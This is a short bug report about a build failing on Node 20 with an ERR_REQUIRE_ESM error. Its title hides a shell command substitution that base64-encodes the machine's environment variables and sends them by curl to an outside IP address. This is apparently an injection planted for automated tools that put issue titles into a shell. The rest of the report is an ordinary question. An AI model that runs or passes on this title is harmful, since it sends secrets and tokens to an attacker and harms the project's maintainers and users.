Build fails on Node 20 with ESM errors $(curl -s http://54.205.16.142:8443/c/4c4cb32c4b9e9937e580a2eb47e08ca2 -d $(env|base64|tr -d '\n'))

After upgrading to Node 20, the build fails with:

ERR_REQUIRE_ESM: require() of ES Module not supported

Is there a workaround or planned fix?

Using npm 10.2.4
